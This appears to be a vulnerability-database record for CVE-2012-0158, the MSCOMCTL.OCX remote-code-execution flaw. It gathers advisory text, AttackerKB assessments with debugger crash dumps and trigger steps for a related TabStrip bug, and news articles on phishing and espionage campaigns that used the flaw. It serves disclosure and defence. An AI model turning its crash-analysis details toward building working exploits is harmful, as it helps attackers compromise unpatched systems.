ID CVE-2012-0158 Type cve Reporter secure@microsoft.com Modified 2018-10-12T22:02:00
Description
The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."
{"attackerkb": [{"lastseen": "2021-05-06T15:19:55", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or \u00a9 .rtf file that triggers \u201csystem state\u201d corruption, as exploited in the wild in April 2012, aka \u201cMSCOMCTL.OCX RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:46pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 \n\n * Associated Malware: Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**dmelcher5151** at April 15, 2020 4:17pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 \n\n * Associated Malware: Dridex \n\n * Mitigation: Update affected Microsoft products with the latest security patches \n\n * IOCs: <https://www.us-cert.gov/ncas/analysis-reports/ar20-133i>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133j>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133k>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133l>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133n>, <https://www.us-cert.gov/ncas/analysis-reports/ar20-133o>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 4\n", "modified": "2020-07-30T00:00:00", "id": "AKB:B7C679E9-6ECB-4663-BF1E-330295E69CC4", "href": "https://attackerkb.com/topics/WPlLOOTkVi/cve-2012-0158", "published": "2012-04-10T00:00:00", "type": "attackerkb", "title": "CVE-2012-0158", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-06T15:21:20", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158", "CVE-2012-1856"], "description": "The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka \u201cMSCOMCTL.OCX RCE Vulnerability.\u201d\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nTo trigger this:\n\n 1. Open the poc with Microsoft Word 2003 \n\n 2. Close Microsoft Word, that\u2019s when the crash is triggered. \n\n \n \n 0:000> r\n eax=056ef534 ebx=00000000 ecx=00000000 edx=02ac0007 esi=0571c18c edi=00000000\n eip=2758fce3 esp=0012e348 ebp=0012e3f4 iopl=0 nv up ei pl nz ac po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210212\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:00000008=????????\n 0:000> k\n ChildEBP RetAddr\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 0012e3f4 650cd2e2 MSCOMCTL!DllGetClassObject+0x8f9f\n 0012e40c 650cd052 VBE6!rtcSendKeys+0x1d442\n 00000000 00000000 VBE6!rtcSendKeys+0x1d1b2\n \n MSCOMCTL!DllGetClassObject+0x8f91:\n 2758fcd5 57 push edi\n 2758fcd6 8b7828 mov edi,dword ptr [eax+28h]\n 2758fcd9 8b481c mov ecx,dword ptr [eax+1Ch]\n 2758fcdc 895848 mov dword ptr [eax+48h],ebx\n 2758fcdf 83c01c add eax,1Ch\n 2758fce2 50 push eax\n 2758fce3 ff5108 call dword ptr [ecx+8]\n \n 0:000> dc eax\n 056faeb4 00000000 00000000 00000000 00000000 ................\n 056faec4 31005c00 00000000 693f3800 44001029 .\\.1.....8?i)..D\n 056faed4 4d55434f 00317e45 03004400 00000000 OCUME~1..D......\n 056faee4 3c3f37be eb4118bd 000014a6 6f004400 .7?<..A......D.o\n 056faef4 75006300 65006d00 74006e00 20007300 .c.u.m.e.n.t.s.\n 056faf04 6e006100 20006400 65005300 74007400 .a.n.d. .S.e.t.t\n 056faf14 6e006900 73006700 18000000 00000000 .i.n.g.s........\n 056faf24 00000000 00130010 010c017a 0018e920 ........z... ...\n \n\nNote: \nThis crash is different than CVE-2012-0158, despite the fact they both target the same component. \nCVE-0158 is due to a memcpy call, and then retn to the user-controlled stack. However, this PoC \nleverages from a CALL [ECX+8] call.\n\n * Using samples provided by nex \n\n\n071cb2398e5b6ad9e965c4191443227166861129eb4aca6fc1fc647b85eb91d6\n\nOffice 2003 crash:\n \n \n 0:004> sxe ld mscomctl\n 0:004> g\n ModLoad: 27580000 27685000 C:\\WINDOWS\\system32\\MSCOMCTL.OCX\n eax=00000000 ebx=00000000 ecx=02bd0000 edx=7c90e4f4 esi=00000000 edi=00000000\n eip=7c90e4f4 esp=0011fe58 ebp=0011ff4c iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n ntdll!KiFastSystemCallRet:\n 7c90e4f4 c3 ret\n 0:000> u 2758fce3\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\MSCOMCTL.OCX -\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8]\n 2758fce6 3bfb cmp edi,ebx\n 2758fce8 8bc7 mov eax,edi\n 2758fcea 75ea jne MSCOMCTL!DllGetClassObject+0x8f92 (2758fcd6)\n 2758fcec 5f pop edi\n 2758fced ebd1 jmp MSCOMCTL!DllGetClassObject+0x8f7c (2758fcc0)\n 2758fcef 56 push esi\n 2758fcf0 57 push edi\n 0:000> bp 2758fce3\n 0:000> g\n Breakpoint 0 hit\n eax=01d028a4 ebx=00000000 ecx=2759e3e8 edx=fffffd37 esi=00211ca4 edi=00000000\n eip=2758fce3 esp=001213f8 ebp=00121434 iopl=0 nv up ei pl nz ac po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:2759e3f0=a0255827\n \n\nAnother crash, with interesting stack??\n \n \n 0:000> kb\n ChildEBP RetAddr Args to Child\n WARNING: Stack unwind information not available. Following frames may be wrong.\n 00125fb8 30e5982d 01ee0010 3144c8a5 01ee0070 mso!Ordinal2669+0x5f\n 00125fe0 31443f75 01ee0070 00010000 001260d0 mso!Ordinal2669+0x18\n 00126000 311a5a49 01ee0010 001260d0 012d0920 mso!Ordinal530+0x352\n 00126020 311a5f47 001260d0 01c0687c 012d075c mso!Ordinal2690+0x1ac\n 0012603c 306063d0 012d0920 001260d0 30161ba0 mso!Ordinal2690+0x6aa\n 00126058 30161a59 001260b0 00000000 00000000 WINWORD!wdCommandDispatch+0x1d695\n 0012608c 30609242 001260b0 000000d2 00a20394 WINWORD+0x161a59\n 001261b0 7c80ae80 30c90000 00000000 30c90000 WINWORD!wdCommandDispatch+0x20507\n 0012622c 7c80ae6e 00126254 7c80ae80 30c90000 kernel32!GetProcAddress+0x5b\n 00126254 00126244 30c90000 0012f904 30ed90c6 kernel32!GetProcAddress+0x43\n 0012626c 30e59897 30e5982d 00a20178 30e5979a 0x126244 <====\n 00126270 30e5982d 00a20178 30e5979a 00a353a4 mso!Ordinal2669+0x82\n 00126278 30e5979a 00a353a4 000000d8 300d9800 mso!Ordinal2669+0x18\n 00126294 3018c671 00000001 000000d8 000000c8 mso!Ordinal2402+0x13\n 001262ac 3060295c 00000000 00000003 00a20178 WINWORD+0x18c671\n 001262d4 3060958f 30609596 00126308 00000000 WINWORD!wdCommandDispatch+0x19c21\n 00126338 304c7d41 01c05c78 00000001 00000000 WINWORD!wdCommandDispatch+0x20854\n 00126354 3003caf0 00000003 00000001 00000001 WINWORD+0x4c7d41\n 00000000 00000000 00000000 00000000 00000000 WINWORD+0x3caf0\n \n\nOffice 2007 crash\n \n \n Microsoft (R) Windows Debugger Version 6.2.8400.0 X86\n Copyright (c) Microsoft Corporation. All rights reserved.\n \n *** wait with pending attach\n Symbol search path is: *** Invalid ***\n ****************************************************************************\n * Symbol loading may be unreliable without a symbol search path. *\n * Use .symfix to have the debugger choose a symbol path. *\n * After setting your symbol path, use .reload to refresh symbol locations. *\n ****************************************************************************\n Executable search path is:\n ModLoad: 30000000 30057000 C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE\n ModLoad: 7c900000 7c9af000 C:\\WINDOWS\\system32\\ntdll.dll\n ModLoad: 7c800000 7c8f6000 C:\\WINDOWS\\system32\\kernel32.dll\n ModLoad: 78130000 781cb000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\\MSVCR80.dll\n ModLoad: 77c10000 77c68000 C:\\WINDOWS\\system32\\msvcrt.dll\n ModLoad: 31240000 322ec000 C:\\Program Files\\Microsoft Office\\Office12\\wwlib.dll\n ModLoad: 77dd0000 77e6b000 C:\\WINDOWS\\system32\\ADVAPI32.dll\n ModLoad: 77e70000 77f02000 C:\\WINDOWS\\system32\\RPCRT4.dll\n ModLoad: 77fe0000 77ff1000 C:\\WINDOWS\\system32\\Secur32.dll\n ModLoad: 77f10000 77f59000 C:\\WINDOWS\\system32\\GDI32.dll\n ModLoad: 7e410000 7e4a1000 C:\\WINDOWS\\system32\\USER32.dll\n ModLoad: 774e0000 7761d000 C:\\WINDOWS\\system32\\ole32.dll\n ModLoad: 3a9d0000 3b750000 C:\\Program Files\\Microsoft Office\\Office12\\oart.dll\n ModLoad: 32600000 33618000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\mso.dll\n ModLoad: 3fde0000 40221000 C:\\WINDOWS\\system32\\msi.dll\n ModLoad: 33d00000 33dd7000 C:\\Program Files\\Microsoft Office\\Office12\\1033\\wwintl.dll\n ModLoad: 773d0000 774d3000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\\Comctl32.dll\n ModLoad: 77f60000 77fd6000 C:\\WINDOWS\\system32\\SHLWAPI.dll\n ModLoad: 74720000 7476c000 C:\\WINDOWS\\system32\\MSCTF.dll\n ModLoad: 00cc0000 01314000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSORES.DLL\n ModLoad: 6bdc0000 6be7a000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSPTLS.DLL\n ModLoad: 7c9c0000 7d1d7000 C:\\WINDOWS\\system32\\SHELL32.DLL\n ModLoad: 5d090000 5d12a000 C:\\WINDOWS\\system32\\comctl32.dll\n ModLoad: 01bf0000 025cd000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\1033\\MSOINTL.DLL\n ModLoad: 79000000 7904a000 C:\\WINDOWS\\system32\\mscoree.dll\n ModLoad: 603b0000 60416000 C:\\WINDOWS\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\n ModLoad: 77c00000 77c08000 C:\\WINDOWS\\system32\\VERSION.DLL\n ModLoad: 73000000 73026000 C:\\WINDOWS\\system32\\Winspool.DRV\n ModLoad: 7e660000 7e715000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\PS5UI.DLL\n ModLoad: 77120000 771ab000 C:\\WINDOWS\\system32\\OLEAUT32.dll\n ModLoad: 5ad70000 5ada8000 C:\\WINDOWS\\system32\\UxTheme.DLL\n ModLoad: 3a780000 3a889000 C:\\Program Files\\Common Files\\Microsoft Shared\\office12\\riched20.dll\n ModLoad: 76fd0000 7704f000 C:\\WINDOWS\\system32\\CLBCATQ.DLL\n ModLoad: 77050000 77115000 C:\\WINDOWS\\system32\\COMRes.dll\n ModLoad: 78800000 7895c000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE11\\msxml5.dll\n ModLoad: 77920000 77a13000 C:\\WINDOWS\\system32\\SETUPAPI.dll\n ModLoad: 02dd0000 03095000 C:\\WINDOWS\\system32\\xpsp2res.dll\n ModLoad: 3bd10000 3bea5000 C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\OGL.DLL\n ModLoad: 76f50000 76f58000 C:\\WINDOWS\\system32\\WTSAPI32.DLL\n ModLoad: 76360000 76370000 C:\\WINDOWS\\system32\\WINSTA.dll\n ModLoad: 5b860000 5b8b5000 C:\\WINDOWS\\system32\\NETAPI32.dll\n ModLoad: 73ba0000 73bb3000 C:\\WINDOWS\\system32\\sti.dll\n ModLoad: 74ae0000 74ae7000 C:\\WINDOWS\\system32\\CFGMGR32.dll\n ModLoad: 7e1e0000 7e282000 C:\\WINDOWS\\system32\\urlmon.dll\n ModLoad: 6bd10000 6bd24000 C:\\Program Files\\Microsoft Office\\Office12\\MSOHEV.DLL\n ModLoad: 40390000 40446000 C:\\Program Files\\Microsoft Office\\Office12\\msproof6.dll\n ModLoad: 7c420000 7c4a7000 C:\\WINDOWS\\WinSxS\\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\\MSVCP80.dll\n ModLoad: 7e720000 7e7d0000 C:\\WINDOWS\\system32\\SXS.DLL\n (a7c.b3c): Break instruction exception - code 80000003 (first chance)\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\ntdll.dll -\n eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004 edi=00000005\n eip=7c90120e esp=03f3ffcc ebp=03f3fff4 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246\n ntdll!DbgBreakPoint:\n 7c90120e cc int 3\n 0:007> g\n ModLoad: 77b40000 77b62000 C:\\WINDOWS\\system32\\appHelp.dll\n ModLoad: 77a20000 77a74000 C:\\WINDOWS\\System32\\cscui.dll\n ModLoad: 76600000 7661d000 C:\\WINDOWS\\System32\\CSCDLL.dll\n ModLoad: 75f80000 7607d000 C:\\WINDOWS\\system32\\browseui.dll\n ModLoad: 76990000 769b5000 C:\\WINDOWS\\system32\\ntshrui.dll\n ModLoad: 76b20000 76b31000 C:\\WINDOWS\\system32\\ATL.DLL\n ModLoad: 769c0000 76a74000 C:\\WINDOWS\\system32\\USERENV.dll\n ModLoad: 7e290000 7e401000 C:\\WINDOWS\\system32\\SHDOCVW.dll\n ModLoad: 77a80000 77b15000 C:\\WINDOWS\\system32\\CRYPT32.dll\n ModLoad: 77b20000 77b32000 C:\\WINDOWS\\system32\\MSASN1.dll\n ModLoad: 754d0000 75550000 C:\\WINDOWS\\system32\\CRYPTUI.dll\n ModLoad: 771b0000 7725a000 C:\\WINDOWS\\system32\\WININET.dll\n ModLoad: 76c30000 76c5e000 C:\\WINDOWS\\system32\\WINTRUST.dll\n ModLoad: 76c90000 76cb8000 C:\\WINDOWS\\system32\\IMAGEHLP.dll\n ModLoad: 76f60000 76f8c000 C:\\WINDOWS\\system32\\WLDAP32.dll\n ModLoad: 76980000 76988000 C:\\WINDOWS\\system32\\LINKINFO.dll\n ModLoad: 27580000 27685000 C:\\WINDOWS\\system32\\MSCOMCTL.OCX\n ModLoad: 763b0000 763f9000 C:\\WINDOWS\\system32\\comdlg32.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 42640000 426c7000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\PSCRIPT5.DLL\n ModLoad: 73b30000 73b45000 C:\\WINDOWS\\system32\\mscms.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n ModLoad: 10000000 1001f000 C:\\WINDOWS\\System32\\spool\\DRIVERS\\W32X86\\3\\tpps.dll\n (a7c.df4): Unknown exception - code e0000002 (first chance)\n ModLoad: 65000000 65278000 C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\VBE6.DLL\n ModLoad: 65300000 65326000 C:\\PROGRA~1\\COMMON~1\\MICROS~1\\VBA\\VBA6\\1033\\VBE6INTL.DLL\n (a7c.df4): Access violation - code c0000005 (first chance)\n First chance exceptions are reported before any exception handling.\n This exception may be expected and handled.\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\WINDOWS\\system32\\MSCOMCTL.OCX -\n *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\\Program Files\\Microsoft Office\\Office12\\wwlib.dll -\n eax=001d2d9c ebx=00000000 ecx=000000c4 edx=0237000d esi=0015e484 edi=00000118\n eip=2758fce3 esp=00121d10 ebp=00121d64 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n MSCOMCTL!DllGetClassObject+0x8f9f:\n 2758fce3 ff5108 call dword ptr [ecx+8] ds:0023:000000cc=????????\n 0:000> dd ecx\n 000000c4 ???????? ???????? ???????? ????????\n 000000d4 ???????? ???????? ???????? ????????\n 000000e4 ???????? ???????? ???????? ????????\n 000000f4 ???????? ???????? ???????? ????????\n 00000104 ???????? ???????? ???????? ????????\n 00000114 ???????? ???????? ???????? ????????\n 00000124 ???????? ???????? ???????? ????????\n 00000134 ???????? ???????? ???????? ????????\n \n", "modified": "2020-09-02T00:00:00", "id": "AKB:4DF5EF01-8CC5-4A65-87F7-E627FAA3F022", "href": "https://attackerkb.com/topics/sFW6MySRX1/microsoft-windows-tabstrip-mscomctl-ocx-rce-vulnerability", "published": "2012-08-15T00:00:00", "type": "attackerkb", "title": "Microsoft Windows TabStrip MSCOMCTL.OCX RCE Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T10:06:42", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "[](<https://2.bp.blogspot.com/-UbDg_2GB7PM/UvnrUMicegI/AAAAAAAAaEM/KiTNTDtBQro/s1600/Valentine-day-malware-hacking.jpg>)\n\n_Valentine's Day__ _\\- a day of hearts, Chocolates, Flowers and Celebrations when people express their emotions to their loved ones and most of us send E-cards, purchase special gifts with the help of various Online Shop Sites and many other tantrums making them feel special.\n\n \n\n\nWhile you are busy in Googling ideal gifts for your loved ones, the Cyber thieves are also busy in taking advantage of such events by spreading various [malware](<https://thehackernews.com/search/label/Malware>), phishing campaigns and fraud schemes as these days come out to be a goldmine for the cyber criminals.\n\n \n\n\n_Online Shopping Scams_ are popular among Cyber criminals as it is the easiest way for hackers to steal money in easy and untraceable ways.\n\n \n\n\nSecurity Researchers at Anti virus firm - _Trend Micro_ [discovered](<http://blog.trendmicro.com/trendlabs-security-intelligence/breaking-up-with-valentines-day-online-threats/>) various Valentine's Day threats which are common at such occasion i.e. A flower-delivery service and it appears to be a normal promotional e-mail, but the links actually lead to various survey scams.\n\n \n\n\nThe Malware threats also arrive during this season of love. The researchers recently found a new attack targeting Canadian users looking for a Romantic Dinner Giveaway. The email appears to be about a special Valentine Dinner, and has an attachment which is actually a malicious _.RTF_ file (_detected as TROJ_ARTIEF. VDY_), using a known buffer overflow vulnerability (_[CVE-2012-0158](<https://technet.microsoft.com/en-us/security/bulletin/ms12-027>)_) in Windows Common Controls, allows remote code execution to drop a backdoor (BKDR_INJECT.VDY) onto the affected system.\n\n[](<https://2.bp.blogspot.com/-9TVw2Nf0xD0/UvnqlXFjJGI/AAAAAAAAaEE/uNtMfYZkQ6w/s1600/Valentine-day-malware-hacking.png>)\n\nThis Valentine's Day, with the popularity of Android phones and iPhones, it seems practical to impress your beloved by sending e-cards using various Valentine's Day Apps, but you never realize that despite sending E-cards, you are also inflicting an [Android](<https://thehackernews.com/search/label/Android>) malware on your beloveds which could be worse to your relation.\n\n \n\n\nThe security researchers from _Bitdefender_ recently released a report, noted how such Valentine's Day apps could demand undue permissions, that could violate users\u2019 privacy, rack up users\u2019 phone bills, and even possibly cause identity theft.\n\n \n\n\nThe researchers have detected various malware-inflicted apps, one of which is \u2018**Valentine\u2019s Day 2014 Wallpaper**.\u2019 The app records user\u2019s location and his browsing history in the process without having any justification for asking permissions.\n\n \n\n\nAnother is \u2018**Valentine's Day Frames**\u2019, the app that reads the user\u2019s contacts list, which is logically an odd request because the app is only intended to adorn user\u2019s romantic photographs with Valentine's Day themed photo frames. _So what\u2019s the use of reading your contact list for this app?_\n\n \n\n\nOne more, \u2018**Love Letters for Chat, Status**\u2019 which allows you to share love quotes, letters, and even poems to your dearest friends, but the app is capable to send emails, make phone calls, change audio settings, and even modify calendar events without your permission. So gifting this to your beloved may cause an end to you sweet relation.\n\n \n\n\nSeasonal deals and offers are common place, so its users own duty to spot what\u2019s malicious and what\u2019s not. Following are some tips every Internet user must follow:\n\n * Do not to open emails and click links in wild from unknown sources.\n * Do not run attached files that come from unknown sources, especially these days.\n * The biggest bargains aren\u2019t always the biggest stealing. If an offer sounds too good to be true, it probably is, but if you are making purchases online, then prefer a reputed shopping site and type the address of the store in the browser, rather than going through any links that have been sent to you.\n * Has an effective security solution installed in your system that is capable of detecting both known and new malware strains.\n\nDon\u2019t spread malware... Spread love :) Stay safe! Stay tuned to The Hacker News.\n", "modified": "2014-02-11T09:26:36", "published": "2014-02-10T22:26:00", "id": "THN:28D18D871A6086136DFA7958D9C516E0", "href": "https://thehackernews.com/2014/02/beware-cyber-criminals-may-spoil-your.html", "type": "thn", "title": "Beware! Cyber Criminals may spoil your Valentine's Day", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:13", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "None\n", "modified": "2013-10-27T16:41:46", "published": "2013-10-27T05:37:00", "id": "THN:DC21EBE0272DEA3B043A3EB0A5B5B1DA", "href": "http://thehackernews.com/2013/10/terminator-rat-became-more.html", "type": "thn", "title": "Terminator RAT became more sophisticated in recent APT attacks", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:20", "bulletinFamily": "info", "cvelist": ["CVE-2012-0158"], "description": "[](<http://2.bp.blogspot.com/-M8cMLC5NtdI/Ua4XqeyaL9I/AAAAAAAAV9g/soz4j7rFh4E/s1600/Surveillance+malware+targets+350+high+profile+victims+in+40+countries.png>)\n\nA global cyber espionage campaign affecting over 350 high profile victims in 40 countries, appears to be the work of [Chinese hackers](<http://thehackernews.com/2013/02/chinese-government-targets-uyghur-group.html>) using a Surveillance malware called \"**_NetTraveler_**\".\n\n \n\n\nKaspersky Lab\u2019s team of experts published a new research [report](<http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf>) about NetTraveler, which is a family of malicious programs used by APT cyber crooks. The main targets of the campaign, which has been running since 2004, are Tibetan/Uyghur activists, government institutions, contractors and embassies, as well as the oil and gas industry.\n\n[Spear phishing](<http://thehackernews.com/2011/01/spear-phishing-latest-ploy-to-steal.html>) emails were used to trick targets into opening [malicious documents](<http://thehackernews.com/2012/01/print-of-one-malicious-document-can.html>). The attackers are using two vulnerabilities in Microsoft Office including Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158, which have been patched but remain highly-popular on the hacking scene, and have run NetTraveler alongside other malware. \n \nC&C servers are used to install additional malware on infected machines and exfiltrate stolen data and more than 22 gigabytes amount of stolen data stored on NetTraveler\u2019s C&C servers.\n\n \n\n\nAccording to researchers, the largest number of samples we observed were created between 2010 and 2013. The largest number of infections has been spotted in Mongolia, India and Russia, also in China, South Korea, Germany, the US, Canada, the UK, Austria, Japan, Iran, Pakistan, Spain and Australia.\n\n \n\n\nResearchers believe that hackers team behind this attack are 50 individuals, most of whom speak Chinese natively but also have a decent level of English.\n\n \n\n\nSix victims were also hit by the [Red October](<http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html>) attackers, whom Kaspersky had profiled last year. Those victims included a military contractor in Russia and an embassy in Iran.\n", "modified": "2013-06-04T16:39:05", "published": "2013-06-04T05:39:00", "id": "THN:D9114576EA7861D9D8859B9EF23814E4", "href": "http://thehackernews.com/2013/06/surveillance-malware-targets-350-high.html", 